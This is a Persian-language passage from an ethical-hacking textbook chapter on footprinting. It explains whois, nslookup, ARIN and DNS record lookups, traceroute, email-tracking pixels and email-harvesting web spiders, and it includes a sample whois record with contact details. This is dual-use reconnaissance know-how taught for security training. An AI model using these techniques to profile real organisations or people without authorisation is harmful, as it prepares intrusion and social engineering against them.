ﻗﺒﻞ از اﻳﻨﻜﻪ در ﻣﻮرد اﻳﻦ اﺑﺰارﻫﺎ ﺑﺤﺚ ﻛﻨﻴﻢ، ﺑﻪ ﺧﺎﻃﺮ داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ اﻃﻼﻋﺎت ﺑﺎز ﻣﻮﺟﻮد، اﻃﻼﻋﺎت ﺑﺎ ا رزﺷﻲ در ﻣﻮرد ﻫﺪف ﻫﺴﺘﻨﺪ از ﻗﺒﻴﻞ ﺷﻤﺎره ﺗﻠﻔﻦ ﻫﺎ و آدرس ﻫﺎ . اﻧﺠﺎم whois ، ﺟﺴﺘﺠﻮي ﺟﺪاول DNS ، و اﺳﻜﻦ آدرس ﻫﺎي IP ﺑﺮاي ﭘﻮرت ﻫﺎي ﺑﺎز، ﻣﺜﺎل ﻫﺎﻳﻲ از اﻃﻼﻋﺎت ﺑﺎز ﻫﺴﺘﻨﺪ . ﺑﺴﻴﺎري ا ز اﻳﻦ اﻃﻼﻋﺎت، از ﻃﺮﻳﻖ روش ﻫﺎي ﻗﺎﻧﻮﻧﻲ ﻗﺎﺑﻞ دﺳﺘﺮس ﻫﺴﺘﻨﺪ . .

21

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي Footprinting ﻋﺒﺎرﺗﻨﺪ از : :

• Whois • Nslookup • ARIN • Neo Trace • VisualRoute Trace • SmartWhois • eMailTracker Pro • Website watcher • Google Earth • GEO Spider • HTTrack Web Copier • E-Mail Spider

DNS Enumeration

ﻓﺮآﻳﻨﺪ ﻳﺎﻓﺘﻦ ﻫﻤﻪ ﺳﺮورﻫﺎي DNS و رﻛﻮردﻫﺎي ﻣﺮﺑﻮﻃﻪ ﺑﺮاي ﻳﻚ ﺳﺎزﻣﺎن را DNS Enumeration ﻣﻲ ﻧﺎﻣﻨﺪ . ﻣﻤﻜﻦ اﺳﺖ ﺳﺎزﻣﺎﻧﻲ ﻫﻢ ﺳﺮورﻫﺎي DNS داﺧﻠﻲ و ﻫﻢ ﺧﺎرﺟﻲ داﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي، ﻧﺎم ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮ، و آدرس ﻫﺎي IP ﺳﻴﺴﺘﻢ ﻫﺎ را اراﺋﻪ دﻫﺪ . .

اﺑﺰارﻫﺎﻳﻲ از ﻗﺒﻴﻞ ARIN ، DNSstuff ، NSlookup ، و Whois ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﺑﺪﺳﺖ آوردن اﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺮاي DNS enumeration اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ، ﺑ ﻪ ﻛﺎر روﻧﺪ . .

Nslookup و DNSstuff

ﻳﻜﻲ از اﺑﺰارﻫﺎي ﻗﺪرﺗﻤﻨﺪي ﻛﻪ ﺑﺎﻳﺪ ﺑﺎ آن آﺷﻨﺎ ﺑﺎﺷﻴﺪ، nslookup اﺳﺖ . اﻳﻦ ا ﺑﺰار، از ﺳﺮورﻫﺎي DNS ﺑﺮاي اﻃﻼﻋﺎت رﻛﻮرد، ﻛﻮﺋﺮي ﻣﻲ ﮔﻴﺮد و در ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي وﻳﻨﺪوز، ﻟﻴﻨﻮﻛﺲ، و ﻳﻮﻧﻴﻜﺲ وﺟﻮد دارد . اﺑﺰارﻫﺎي ﻫﻚ از ﺟﻤﻠﻪ Sam Spade ، داراي اﺑﺰار nslookup ﻫﺴﺘﻨﺪ . .

ﺑﺎ اﻃﻼﻋﺎت ﺟﻤﻊ آوري ﺷﺪه از Whois ، ﻣﻲ ﺗﻮاﻧﻴﺪ از nslookup ﺑﺮاي ﻳﺎﻓﺘﻦ آدرس ﻫﺎي IP ﺳﺮورﻫﺎ و ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي دﻳﮕﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﺑﺎ اﺳﺘﻔﺎده از اﻃﻼﻋﺎت name server ﻫﺎي اﺻﻠﻲ از Whois ( AUTH1.NS.NY1.NET) ، ﻣﻲ ﺗﻮاﻧﻴﺪ آدرس IP ﺳﺮور اﻳﻤﻴﻞ را ﺑﺪﺳﺖ آورﻳﺪ . .

22

اﺑﺰارﻫﺎي زﻳﺎدي وﺟﻮد دارﻧﺪ ﻛﻪ ﻛﺎر ﻫﻚ را ﺳﺎده ﻛﺮده اﻧﺪ . DNSstuff ، ﻳﻜﻲ از اﻳﻦ اﺑﺰار ﻫﺎ اﺳﺖ . ﺑﻪ ﺟﺎي اﺳﺘﻔﺎده از اﺑﺰار دﺳﺘﻮري nslookup ﺑﺎ ﭘﺎراﻣﺘﺮﻫﺎ و ﺳﻮﺋﻴﭻ ﻫﺎي ﻓﺮاوان، ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت رﻛﻮرد DNS ، ﺗﻨﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺑﻪ وب ﺳﺎﻳﺖ http://www.dnsstuff.com ﺑﺮوﻳﺪ و ﺟﺴﺘﺠﻮي آﻧﻼﻳﻦ رﻛﻮرد DNS را اﻧﺠﺎم دﻫﻴﺪ . ﺷﻜﻞ زﻳﺮ، ﻣﺜﺎﻟﻲ از ﺟﺴﺘﺠﻮي رﻛﻮرد DNS را ﺑﺮاي ﺳﺎﻳﺖ http://www.eccouncil.org ﺑﺎ اﺳﺘﻔﺎده از DNSstuff.com ﻧﺸﺎن ﻣﻲ دﻫﺪ . . اﻳﻦ ﺟﺴﺘﺠﻮ، ﺗﻤﺎم رﻛﻮردﻫﺎي ﻣﺴﺘﻌﺎر ﺑﺮاي http://www.eccouncil.org و آدرس IP ﺳﺮور وب را ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﺣﺘﻲ ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺗﻤﺎم name server ﻫﺎ و آدرس ﻫﺎي IP ﻣﺮﺑﻮﻃﻪ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻴﺪ . .

ﻣﻔﻬﻮم Whois و ARIN Lookup

اﺑﺘﺪا، Whois از ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﻮﻧﻴﻜﺲ آﻏﺎز ﺷﺪ اﻣﺎ اﻛﻨﻮن در ﺑﺴﻴﺎري از ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ و اﺑﺰارﻫﺎي ﻫﻚ ، ﺑﺮ روي اﻳﻨﺘﺮﻧﺖ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . اﻳﻦ اﺑﺰار، ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭼﻪ ﻛﺴﻲ ﻧﺎم داﻣﻴﻨﻲ ﻛﻪ ﺑﺮاي وب ﺳﺎﻳﺖ ﻳﺎ اﻳﻤﻴﻞ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد را ﺛﺒﺖ ﻛﺮده اﺳﺖ . .

ﺳﺎزﻣﺎن ICANN ، ﺑﻪ اﺳﺎﻣﻲ داﻣﻴﻦ ﻧﻴﺎز دارد ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮد ﺗﻨﻬﺎ ﻳﻚ ﺷﺮﻛﺖ از آن ﻧﺎم داﻣﻴﻦ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﺑﺰار Whois ، از ﭘﺎﻳﮕﺎه داده ﻛﻮﺋﺮي ﻣﻲ ﮔﻴﺮد ﺗﺎ اﻃﻼﻋﺎت ﺗﻤﺎس درﺑﺎره ا ﻓﺮاد ﻳﺎ ﺳﺎزﻣﺎﻧﻲ ﻛﻪ داﻣﻴﻦ ﺛﺒﺖ ﻛﺮده اﺳﺖ را ﺑﺎزﻳﺎﺑﻲ ﻛﻨﺪ . .

Whois ) Smart Whois ﻫﻮﺷﻤﻨﺪ ) ﺑﺮﻧﺎﻣﻪ ﺟﻤﻊ آوري اﻃﻼﻋﺎت اﺳﺖ ﻛﻪ ﺑﻪ ﺷ ﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﻤﺎم اﻃﻼﻋﺎت در دﺳﺘﺮس درﺑﺎره آدرس ﻫﺎي IP ، ﻧﺎم دﺳﺘﮕﺎه ﻫﺎ، ﻳﺎ داﻣﻴﻦ، ﺷﺎﻣﻞ ﻛﺸﻮر، اﻳﺎﻟﺖ ﻳﺎ اﺳﺘﺎن، ﺷﻬﺮ، اﺳﻢ اراﺋﻪ دﻫﻨﺪه ﺷﺒﻜﻪ، اﻃﻼﻋﺎت ﺗﻤﺎس ﻣﺪﻳﺮ ﺷﺒﻜﻪ و ﻣﺪﻳﺮ ﻓﻨﻲ را ﭘﻴﺪا ﻛﻨﻴﺪ . Smart Whois ، ﻧﺴﺨﻪ ﮔﺮاﻓﻴﻜﻲ از ﺑﺮﻧﺎﻣﻪ Basic Whois اﺳﺖ . .

23

ARIN ، ﭘﺎﻳﮕﺎه داده اي اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ ﻣﺎﻟﻚ آدرس ﻫﺎي IP اﺳﺘﺎﺗﻴﻚ اﺳﺖ . ﭘﺎﻳﮕﺎه داده ARIN ، ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار Whois ﻫﻤﭽﻮن http://www.arin.net/whois ﻣﻮرد ﻛﻮﺋﺮي ﻗﺮار ﻣﻲ ﮔﻴﺮد . .

ﺷﻜﻞ زﻳﺮ، ﺟﺴﺘﺠﻮي Whois ﺑﺮاي http://www.yahoo.com را ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﺗﻮﺟﻪ داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ آدرس ﻫﺎ، اﻳﻤﻴﻞ ﻫﺎ، و اﻃﻼﻋﺎت ﺗﻤﺎس در ﺟﺴﺘﺠﻮي Whois ﻗﺮار دارﻧﺪ . اﻳﻦ اﻃﻼﻋﺎت ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻮﺳﻂ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺑﺮاي ﻳﺎﻓﺘﻦ ﻣﺴﺌﻮل ﻳﻚ آدرس IP و ﺳﺎزﻣﺎﻧﻲ ﻛﻪ ﻣﺎﻟﻚ ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺖ، ﻳﺎ ﺗﻮﺳﻂ ﻫﻜﺮ ﺷﺮور ﺑﺮاي اﻧﺠﺎم ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . .

ﺷﻤﺎ ﺑﺎﻳﺪ اﻃﻼﻋﺎت در دﺳﺘﺮس ﻋﻤﻮﻣﻲ ﻛﻪ در ﭘﺎﻳﮕﺎه ﻫﺎي داده ﻫﻤﭽﻮن ARIN وﺟﻮد دارﻧﺪ را ﺑﺪاﻧﻴﺪ و ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻜﺮ ﺷﺮور ﻧﻤﻲ ﺗﻮاﻧﺪ از اﻳﻦ اﻃﻼﻋﺎت ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ ﻋﻠﻴﻪ ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﺧﺮوﺟﻲ ARIN ﺑﺮاي http://www.yahoo.com

ﻧﻜﺘﻪ : ﺑﻪ ﻏﻴﺮ از ARIN ، ﻣﺮاﻛﺰ دﻳﮕﺮي ﻧﻴﺰ در ﺳﺮاﺳﺮ ﺟﻬﺎن ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر وﺟﻮد دارﻧﺪ از ﻗﺒﻴﻞ : RIPE NCC ، LACNIC ، و APNIC . .

24

ﺗﺤﻠﻴﻞ ﺧﺮوﺟﻲ Whois

ﺳﺎده ﺗﺮﻳﻦ راه ﺑﺮاي اﻧﺠﺎم Whois ، اﺗﺼﺎل ﺑﻪ وب ﺳﺎﻳﺖ ( ﺑﺮاي ﻣﺜﺎل، www.networksolutions.com ) و اﻧﺠﺎم ﺟﺴﺘﺠﻮي Whois اﺳﺖ . ﻣﺘﻦ زﻳﺮ، ﺧﺮوﺟﻲ ﺟﺴﺘﺠﻮي Whois ﺑﺮاي ﺳﺎﻳﺖ www.eccouncil.org اﺳﺖ : :

Domain ID: D81180127-LROR

Domain Name: ECCOUNCIL.ORG

Created On: 14-Dec-2001 10:13:06 UTC

Last Updated On: 19-Aug-2004 03:49:53 UTC

Expiration Date: 14-Dec-2006 10:13:06 UTC

Sponsoring Registrar: Tucows Inc. (R11-LROR)

Status: OK

Registrant ID: tuTv2ItRZBMNd4lA

Registrant Name: John Smith

Registrant Organization: International Council of E-Commerce Consultants

Registrant Street1:67 Wall Street, 22nd Floor

Registrant Street2:

Registrant Street3:

Registrant City: New York

Registrant State/Province: NY

Registrant Postal Code: 10005-3198

Registrant Country: US

Registrant Phone: +1.2127098253

Registrant Phone Ext.:

Registrant FAX: +1.2129432300

Registrant FAX Ext.:

Registrant Email:[email protected]

Admin ID: tus9DYvpp5mrbLNd 25

Admin Name: Susan Johnson

Admin Organization: International Council of E-Commerce Consultants

Admin Street1:67 Wall Street, 22nd Floor

Admin Street2:

Admin Street3:

Admin City: New York

Admin State/Province: NY

Admin Postal Code: 10005-3198

Admin Country: US

Admin Phone: +1.2127098253

Admin Phone Ext.:

Admin FAX: +1.2129432300

Admin FAX Ext.:

Admin Email:[email protected]

Tech ID: tuE1cgAfi1VnFkpu

Tech Name: Jacob Eckel

Tech Organization: International Council of E-Commerce Consultants

Tech Street1:67 Wall Street, 22nd Floor

Tech Street2:

Tech Street3:

Tech City: New York

Tech State/Province: NY

Tech Postal Code: 10005-3198

Tech Country: US

Tech Phone: +1.2127098253

Tech Phone Ext.:

Tech FAX: +1.2129432300 26

Tech FAX Ext.:

Tech Email:[email protected]

Name Server: ns1.xyz.net

Name Server: ns2.xyz.net

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي Whois ﻋﺒﺎرﺗﻨﺪ از:

• Wikto Footprinting Tool • Whois Lookup • SmartWhois • ActiveWhois • LanWhois • CountryWhois • WhereIsIP • ip2country • CallerIP • Web Data Extractor

و ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي آﻧﻼﻳﻦ Whois ﻋﺒﺎرﺗﻨﺪ از : :

• www.samspade.org • www.geektools.com • www.whois.net • www.demon.net • www.whatismyip.com

ﭘﻴﺪا ﻛﺮدن ﺑﺎزه آدرس ﻫﺎي ﺷﺒﻜﻪ

ﻫﺮ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪي ﺑﺎﻳﺪ ﺑﺪاﻧﺪ ﻛﻪ ﭼﮕﻮﻧﻪ ﺑﺎزه ﺷﺒﻜﻪ و subnet mask ﺳﻴﺴﺘﻢ ﻫﺪف را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . از از . آدرس ﻫﺎي IP ، ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎي ﻣﻘﺼﺪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ آدرس ﻫﺎي IP را در ﺛﺒﺖ ﻛﻨﻨﺪه ﻫﺎي اﻳﻨﺘﺮﻧﺘﻲ ﻫﻤﭽﻮن ARIN ﻳﺎ AINA ﭘﻴﺪا ﻛﻨﻴﺪ . .

ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮي ﺑﺨﻮاﻫﺪ ﻛﻪ ﻣﻜﺎن ﺟﻐﺮاﻓﻴﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﻫﺪف را ﭘﻴﺪا ﻛﻨﺪ . او اﻳﻦ ﻛﺎر، را ﺑﺎ ردﻳﺎﺑﻲ ﻣﺴﻴﺮ ﻳﻚ ﭘﻴﺎم ﻛﻪ ﺑﻪ آدرس IP ﻣﻘﺼﺪ ارﺳﺎل ﺷﺪه اﺳﺖ ﺑﺪﺳﺖ ﻣﻲآ دور . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن VisualRoute ، traceroute ، و NeoTrace ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻣﺴﻴﺮ ﻫﺪف اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

27

ﻋﻼوه ﺑﺮ اﻳﻦ، ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺷﺒﻜﻪ ﻣﻘﺼﺪ را ردﻳﺎﺑﻲ ﻛﻨﻴﺪ، اﻃﻼﻋﺎت ﻣﻔﻴﺪ دﻳﮕﺮي ﻧﻴﺰ ﺑﺪﺳﺖ ﻣﻲ آ ور ﻳﺪ . ﺑﺮاي ﻣﺜﺎل، ﻣﻲ ﺗﻮاﻧﻴﺪ آدرس ﻫﺎي IP داﺧﻠﻲ ﻣﺎﺷﻴﻦ ﻫﺎ، ﻳﺎ ﺣﺘﻲ آدرس IP دروازه اﻳﻨﺘﺮﻧﺘﻲ را ﺑﺪﺳﺖ آورﻳﺪ و ﺳﭙﺲ از اﻳﻦ آدرس ﻫﺎ ﺑﺮاي ﻓﺮآﻳﻨﺪﻫﺎي ﺣﻤﻠﻪ ﻳﺎ اﺳﻜﻦ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

ﺷﻨﺎﺳﺎﻳﻲ اﻧﻮاع ﻣﺨﺘﻠﻒ رﻛﻮردﻫﺎي DNS

رﻛﻮردﻫﺎي راﻳﺞ DNS و ﻛﺎرﺑﺮد آﻧﻬﺎ ﻋﺒﺎرﺗﻨﺪ از : :

• A : ﺗﺒﺪﻳﻞ ﻧﺎم ﺑﻪ آدرس IP IP • SOA : ﻣﺸﺨﺺ ﻛﻨﻨﺪه ﺳﺮور DNS ﻣﺴﺌﻮل ﺑﺮاي اﻃﻼﻋﺎت داﻣﻴﻦ • CNAME : اﺳﺎﻣﻲ اﺿﺎﻓﻲ ﻳﺎ ﻣﺴﺘﻌﺎر ﺑﺮاي رﻛﻮردﻫﺎ ﻣﻲ دﻫﺪ • MX : ﻣﺸﺨﺺ ﻛﻨﻨﺪه ﺳﺮور اﻳﻤﻴﻞ ﺑﺮاي داﻣﻴﻦ اﺳﺖ • SRV : ﺳﺮوﻳﺲ ﻫﺎﻳﻲ از ﻗﺒﻴﻞ directory services را ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ • PTR : ﺗﺒﺪﻳﻞ آدرس ﻫﺎي IP ﺑﻪ اﺳﻢ • NS : دﻳﮕﺮ Name server ﻫﺎي ﺷﺒﻜﻪ را ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ

ﻧﺤﻮه ﻛﺎر traceroute در footprinting

Traceroute، اﺑﺰاري ﺑﺮاي ردﻳﺎﺑﻲ ﺑﺴﺘﻪ اﺳﺖ ﻛﻪ در اﻏﻠﺐ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎ وﺟﻮد دارد . ﺑﺎ ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎي ICMP ﺑﻪ ﺳﻤﺖ ﻣﻘﺼﺪ، آدرس ﻫﺎي ﺑﻴﻦ راه را ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﭘﻴﺎم ﻫﺎي ICMP از روﺗﺮي ﻋﺒﻮر ﻛﺮد، ﻣﻘﺪار TTL ﻳﻚ واﺣﺪ ﻛﻢ ﻣﻲ ﺷﻮد . ﺑﻨﺎﺑﺮاﻳﻦ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻔﻬﻤﺪ ﻛﻪ ﭼﻨﺪ ﺗﺎ روﺗﺮ در ﻣﺴﻴﺮ وﺟﻮد دارد . .

ﻳﻜﻲ از ﻧﻘﺎط ﺿﻌﻒ آن زﻣﺎﻧﻲ اﺳﺖ ﻛﻪ ﺑﺎ ﻓﺎﻳﺮواﻟﻲ ﻣﻮاﺟﻪ ﻣﻲ ﺷﻮد . از آﻧﺠﺎﺋﻴﻜﻪ ﻛﻪ ﻓﺎﻳﺮوال، اﺑﺰار tracerout را ﻣﺘﻮﻗﻒ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺟﻠﻮي ﻛﺸﻒ ﺷﺒﻜﻪ را ﺑﮕﻴﺮد، ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻫﻜﺮ ﻫﺸﺪار دﻫﺪ ﻛﻪ ﻓﺎﻳﺮوال وﺟﻮد دارد ﺑﻨﺎﺑﺮاﻳﻦ، ﺑﺎﻳﺪ از ﺗﻜﻨﻴﻚ ﻫﺎي دور زدن ﻓﺎﻳﺮوال اﺳﺘﻔﺎده ﺷﻮد . .

Sam Spade و ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي دﻳﮕﺮ ﻫﻚ، اﺑﺰار traceroute را دارﻧﺪ . ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي وﻳﻨﺪوز، از دﺳﺘﻮر tracert hostname ﺑﺮاي اﻧﺠﺎم traceroute اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﺷﻜﻞ زﻳﺮ، ﻣﺜﺎﻟﻲ از ﺧﺮوﺟﻲ traceroute را ﺑﺮاي ﺳﺎﻳﺖ www.yahoo.com ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

28

اﻳﻦ دﺳﺘﻮر، روﺗﺮﻫﺎﻳﻲ ﻛﻪ در ﻣﺴﻴﺮ وﺟﻮد دارﻧﺪ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . از آﻧﺠﺎﺋﻴﻜﻪ ﻣﻌﻤﻮﻻ روﺗﺮﻫﺎ ﺑﺮ اﺳﺎس ﻣﻜﺎن ﻓﻴﺰﻳﻜﻲ ﺷﺎن، ﻧﺎم ﮔﺬاري ﻣﻲ ﺷﻮﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﻧﺘﺎﻳﺞ tracert ، ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻣﻜﺎن اﻳﻦ دﺳﺘﮕﺎه ﻫﺎ را ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﺑﻪ اﻳﻦ ﻣﻨﻈﻮر اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : :

3D Traceroute • NeoTrace • VisualRoute Trace • Path Analyzer Pro • Maltego •

اﺳﺘﻔﺎده از Email Tracking

ﺑﺮﻧﺎﻣﻪ ﻫﺎي Email Tracking ، ﺑﻪ ارﺳﺎل ﻛﻨﻨﺪه اﻳﻤﻴﻞ اﻣﻜﺎن ﻣﻲ دﻫﻨﺪ ﻛﻪ ﺑﺪاﻧﺪ آﻳﺎ ﮔﻴﺮﻧﺪه ﭘﻴﺎم، اﻳﻤﻴﻞ را ﺧﻮاﻧﺪه، ﻓﺮوارد ﻛﺮده، ﺗﻐﻴﻴﺮ داده ، ﭘﺎك ﻛﺮده اﺳﺖ ﻳﺎ ﻧﻪ . اﻏﻠﺐ ﺑﺮﻧﺎﻣﻪ ﻫﺎي Email Tracking ، ﺑﺎ ﺿﻤﻴﻤﻪ ﻛﺮدن ﻳﻚ اﺳﻢ داﻣﻴﻦ ﺑﻪ آدرس اﻳﻤﻴﻞ ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ ﻣﺜﻼ readnotify.com . ﻳﻚ ﻓﺎﻳﻞ ﮔﺮاﻓﻴﻜﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻚ ﭘﻴﻜﺴﻞ دارد و ﻗﺎﺑﻞ ﺗﻮﺟﻪ

29

ﻧﻴﺴﺖ را ﺑﻪ اﻳﻤﻴﻞ ﺿﻤﻴﻤﻪ ﻣﻲ ﻛﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، زﻣﺎﻧﻴﻜﻪ ﻋﻤﻠﻲ ﺑﺮ روي آن اﻳﻤﻴﻞ اﻧﺠﺎم ﻣﻲ ﺷﻮد، اﻳﻦ ﻓﺎﻳﻞ ﮔﺮاﻓﻴﻜﻲ ﺑﻪ ﺳﺮور ﻣﺘﺼﻞ ﺷﺪه و ارﺳﺎل ﻛﻨﻨﺪه را ﻣﻄﻠﻊ ﻣﻲ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي VisualRoute Mail Tracker و eMail Tracker Pro ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﺑﻪ ﻛﺎر ﻣﻲ روﻧﺪ . .

ﻧﺤﻮه ﻛﺎر Web Spider ﻫﺎ ﻫﺎ

Spammer ﻫﺎ، ﻛﻪ آدرس ﻫﺎي اﻳﻤﻴﻞ را از اﻳﻨﺘﺮﻧﺖ ﺟﻤﻊ آوري ﻣﻲ ﻛﻨﻨﺪ ، از Web Spider ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . Web Spider ، وب ﺳﺎﻳﺖ ﻫﺎ را ﺟﺴﺘﺠﻮ ﻣﻲ ﻛﻨﺪ ﺗﺎ اﻃﻼﻋﺎت ﻣﺸﺨﺼﻲ از ﻗﺒﻴﻞ آدرس ﻫﺎي اﻳﻤﻴﻞ را ﺟﻤﻊ آوري ﻛﻨﺪ . Web Spider ، ﺑﻪ دﻧﺒﺎل ﻗﺎﻟﺐ ﻋﻤﻮﻣﻲ اﻳﻤﻴﻞ ﻫﺎ ﻛﻪ ﺑﺎ @ ﻫﻤﺮاه ﻫﺴﺘﻨﺪ ﻣﻲ ﮔﺮدد و آﻧﻬﺎ را داﺧﻞ ﻟﻴﺴﺖ ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ . اﻳﻦ آدرس ﻫﺎ ﺑﻪ ﭘﺎﻳﮕﺎه داده اﺿﺎﻓﻪ ﻣﻲ ﺷﻮد و ﻣﻤﻜﻦ اﺳﺖ ﺑﻌﺪا ﺑﺮاي ارﺳﺎل اﻳﻤﻴﻞ ﻫﺎي ﻧﺎﺧﻮاﺳﺘﻪ اﺳﺘﻔﺎده .دﺷﻮ Web Spider ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﺟ ﺴﺘﺠﻮي ﻫﻤﻪ ﻧﻮع اﻃﻼﻋﺎت ﺑﺮ روي اﻳﻨﺘﺮﻧﺖ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از Web Spider ﺑﺮاي ﺧﻮدﻛﺎرﺳ ﺎزي ﻓﺮآﻳﻨﺪ ﺟﻤﻊ آوري اﻃﻼﻋﺎت اﺳﺘﻔﺎده ﻛﻨﺪ . ﻳﻚ روش ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از Web Spider ﻫﺎ ﺑﺮاي ﺳﺎﻳﺖ ﺷﻤﺎ اﻳﻦ اﺳﺖ ﻛﻪ ﻓﺎﻳﻞ robots.txt را ﺑﺎ ﻟﻴﺴﺘﻲ از داﻳﺮﻛﺘﻮري ﻫﺎﻳﻲ ﻛﻪ ﻣﻲ ﺧﻮاﻫﻴﺪ از crawling ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ، در ﻣﺴﻴﺮ رﻳﺸﻪ وب ﺳﺎﻳﺖ ﺗﺎن ﻗﺮار دﻫﻴﺪ . .

ﻧﻜﺘﻪ : ﻓﺎﻳﻞ robots.txt در رﻳﺸﻪ ﻗﺮار دارد و ﻟﻴﺴﺘﻲ از داﻳﺮﻛﺘﻮري ﻫﺎ و ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﻧﻤﻲ ﺧﻮاﻫﻴﻢ ﺗﻮﺳﻂ ﻣﻮﺗﻮرﻫﺎي ﺟﺴﺘﺠﻮ، اﻳﻨﺪﻛﺲ ﺷﻮﻧﺪ را ﻗﺮار ﻣﻲ دﻫﻴﻢ . .

اﺑﺰارﻫﺎي Web data Extractor و 1st E-Mail Address Extractor ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﺑﻪ ﻛﺎرﻣﻲ روﻧﺪ . .

ﻣﺮاﺣﻞ اﻧﺠﺎم Footprinting

.1 ﭘﻴﺪا ﻛﺮدن آدرس ﻫﺎي داﺧﻠﻲ و ﺧﺎرﺟﻲ ﺷﺮﻛﺖ .2 اﻧﺠﺎم ﺟﺴﺘﺠﻮي Whois ﺑﺮاي ﺟﺰﺋﻴﺎت ﺷﺨﺼﻲ 30

